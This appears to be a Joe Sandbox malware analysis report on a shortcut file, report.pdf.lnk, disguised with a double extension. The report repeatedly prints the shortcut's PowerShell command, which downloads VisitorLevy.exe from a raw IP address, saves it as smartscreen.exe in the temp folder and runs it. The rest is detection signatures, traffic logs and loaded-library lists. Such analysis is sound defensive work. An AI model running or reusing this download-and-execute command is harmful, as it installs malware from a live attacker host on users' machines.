Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
report.pdf.lnk

Overview

General Information

Sample name:report.pdf.lnk
Analysis ID:1548219
MD5:55954104c8a8dc66a41548f4eed8eeeb
SHA1:16ccdc346e47c1a35f6bfb6ef2af307a17bdada2
SHA256:8aaed2aa282a84b5ae31cc397c4602e2ec5b376370a19f3e8884d5333d699e34
Tags:lnkuser-abuse_ch
Infos:

Detection

Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
AI detected suspicious sample
Machine Learning detection for sample
Sigma detected: Suspicious Invoke-WebRequest Execution
Suspicious powershell command line found
Uses an obfuscated file name to hide its real file extension (double extension)
Windows shortcut file (LNK) contains suspicious command line arguments
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • powershell.exe (PID: 5944 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Invoke-WebRequest -Uri "http://79.124.58.130:443/VisitorLevy.exe" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "smartscreen.exe"); Start-Process -FilePath (Join-Path ([System.IO.Path]::GetTempPath()) "smartscreen.exe")" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 6640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Invoke-WebRequest -Uri "http://79.124.58.130:443/VisitorLevy.exe" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "smartscreen.exe"); Start-Process -FilePath (Join-Path ([System.IO.Path]::GetTempPath()) "smartscreen.exe")", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Invoke-WebRequest -Uri "http://79.124.58.130:443/VisitorLevy.exe" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "smartscreen.exe"); Start-Process -FilePath (Join-Path ([System.IO.Path]::GetTempPath()) "smartscreen.exe")", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Invoke-WebRequest -Uri "http://79.124.58.130:443/VisitorLevy.exe" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "smartscreen.exe"); Start-Process -FilePath (Join-Path ([System.IO.Path]::GetTempPath()) "smartscreen.exe")", ProcessId: 5944, ProcessName: powershell.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Invoke-WebRequest -Uri "http://79.124.58.130:443/VisitorLevy.exe" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "smartscreen.exe"); Start-Process -FilePath (Join-Path ([System.IO.Path]::GetTempPath()) "smartscreen.exe")", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Invoke-WebRequest -Uri "http://79.124.58.130:443/VisitorLevy.exe" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "smartscreen.exe"); Start-Process -FilePath (Join-Path ([System.IO.Path]::GetTempPath()) "smartscreen.exe")", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Invoke-WebRequest -Uri "http://79.124.58.130:443/VisitorLevy.exe" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "smartscreen.exe"); Start-Process -FilePath (Join-Path ([System.IO.Path]::GetTempPath()) "smartscreen.exe")", ProcessId: 5944, ProcessName: powershell.exe
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Invoke-WebRequest -Uri "http://79.124.58.130:443/VisitorLevy.exe" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "smartscreen.exe"); Start-Process -FilePath (Join-Path ([System.IO.Path]::GetTempPath()) "smartscreen.exe")", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Invoke-WebRequest -Uri "http://79.124.58.130:443/VisitorLevy.exe" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "smartscreen.exe"); Start-Process -FilePath (Join-Path ([System.IO.Path]::GetTempPath()) "smartscreen.exe")", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Invoke-WebRequest -Uri "http://79.124.58.130:443/VisitorLevy.exe" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "smartscreen.exe"); Start-Process -FilePath (Join-Path ([System.IO.Path]::GetTempPath()) "smartscreen.exe")", ProcessId: 5944, ProcessName: powershell.exe
Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Invoke-WebRequest -Uri "http://79.124.58.130:443/VisitorLevy.exe" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "smartscreen.exe"); Start-Process -FilePath (Join-Path ([System.IO.Path]::GetTempPath()) "smartscreen.exe")", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Invoke-WebRequest -Uri "http://79.124.58.130:443/VisitorLevy.exe" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "smartscreen.exe"); Start-Process -FilePath (Join-Path ([System.IO.Path]::GetTempPath()) "smartscreen.exe")", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Invoke-WebRequest -Uri "http://79.124.58.130:443/VisitorLevy.exe" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "smartscreen.exe"); Start-Process -FilePath (Join-Path ([System.IO.Path]::GetTempPath()) "smartscreen.exe")", ProcessId: 5944, ProcessName: powershell.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Invoke-WebRequest -Uri "http://79.124.58.130:443/VisitorLevy.exe" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "smartscreen.exe"); Start-Process -FilePath (Join-Path ([System.IO.Path]::GetTempPath()) "smartscreen.exe")", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Invoke-WebRequest -Uri "http://79.124.58.130:443/VisitorLevy.exe" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "smartscreen.exe"); Start-Process -FilePath (Join-Path ([System.IO.Path]::GetTempPath()) "smartscreen.exe")", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Invoke-WebRequest -Uri "http://79.124.58.130:443/VisitorLevy.exe" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "smartscreen.exe"); Start-Process -FilePath (Join-Path ([System.IO.Path]::GetTempPath()) "smartscreen.exe")", ProcessId: 5944, ProcessName: powershell.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: report.pdf.lnkReversingLabs: Detection: 18%
Source: Submited SampleIntegrated Neural Analysis Model: Matched 97.9% probability
Source: report.pdf.lnkJoe Sandbox ML: detected
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb@ source: powershell.exe, 00000000.00000002.1459981190.0000020277770000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.1460670177.0000020277848000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: em.pdb source: powershell.exe, 00000000.00000002.1459981190.0000020277770000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: em.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: powershell.exe, 00000000.00000002.1459981190.0000020277770000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System32\netutils.dlloft.PowerShell.Commands.Utility.pdbgeNames source: powershell.exe, 00000000.00000002.1458776852.000002027746F000.00000004.00000020.00020000.00000000.sdmp
Source: Joe Sandbox ViewASN Name: TAMATIYA-ASBG TAMATIYA-ASBG
Source: global trafficHTTP traffic detected: GET /VisitorLevy.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 79.124.58.130:443Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /VisitorLevy.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 79.124.58.130:443Connection: Keep-Alive
Source: unknownTCP traffic detected without corresponding DNS query: 79.124.58.130
Source: unknownTCP traffic detected without corresponding DNS query: 79.124.58.130
Source: unknownTCP traffic detected without corresponding DNS query: 79.124.58.130
Source: unknownTCP traffic detected without corresponding DNS query: 79.124.58.130
Source: unknownTCP traffic detected without corresponding DNS query: 79.124.58.130
Source: unknownTCP traffic detected without corresponding DNS query: 79.124.58.130
Source: global trafficHTTP traffic detected: GET /VisitorLevy.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 79.124.58.130:443Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /VisitorLevy.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 79.124.58.130:443Connection: Keep-Alive
Source: powershell.exe, 00000000.00000002.1434299738.000002020193C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1434299738.0000020201192000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.124.58.130:443
Source: powershell.exe, 00000000.00000002.1457901735.0000020276E10000.00000004.00000020.00020000.00000000.sdmp, report.pdf.lnkString found in binary or memory: http://79.124.58.130:443/VisitorLevy.exe
Source: powershell.exe, 00000000.00000002.1457824442.00000202755B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://79.124.58.130:443/visitorlevy.exe
Source: powershell.exe, 00000000.00000002.1454205778.00000202101B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1454205778.0000020210070000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.1434299738.0000020200232000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.1434299738.0000020200001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.1434299738.0000020200232000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.1434299738.0000020200001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.1454205778.0000020210070000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.1454205778.0000020210070000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.1454205778.0000020210070000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.1434299738.0000020200232000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.1434299738.0000020201192000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000000.00000002.1454205778.00000202101B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1454205778.0000020210070000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443

System Summary

barindex
Source: report.pdf.lnkLNK file: -Command "Invoke-WebRequest -Uri "http://79.124.58.130:443/VisitorLevy.exe" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "smartscreen.exe"); Start-Process -FilePath (Join-Path ([System.IO.Path]::GetTempPath()) "smartscreen.exe")"
Source: classification engineClassification label: mal80.evad.winLNK@2/5@0/1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_acyx2r45.4b4.ps1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: report.pdf.lnkReversingLabs: Detection: 18%
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Invoke-WebRequest -Uri "http://79.124.58.130:443/VisitorLevy.exe" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "smartscreen.exe"); Start-Process -FilePath (Join-Path ([System.IO.Path]::GetTempPath()) "smartscreen.exe")"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: report.pdf.lnkLNK file: ..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb@ source: powershell.exe, 00000000.00000002.1459981190.0000020277770000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.1460670177.0000020277848000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: em.pdb source: powershell.exe, 00000000.00000002.1459981190.0000020277770000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: em.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: powershell.exe, 00000000.00000002.1459981190.0000020277770000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System32\netutils.dlloft.PowerShell.Commands.Utility.pdbgeNames source: powershell.exe, 00000000.00000002.1458776852.000002027746F000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

barindex
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Invoke-WebRequest -Uri "http://79.124.58.130:443/VisitorLevy.exe" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "smartscreen.exe"); Start-Process -FilePath (Join-Path ([System.IO.Path]::GetTempPath()) "smartscreen.exe")"

Persistence and Installation Behavior

barindex
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Hooking and other Techniques for Hiding and Protection

barindex
Source: Possible double extension: pdf.lnkStatic PE information: report.pdf.lnk
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
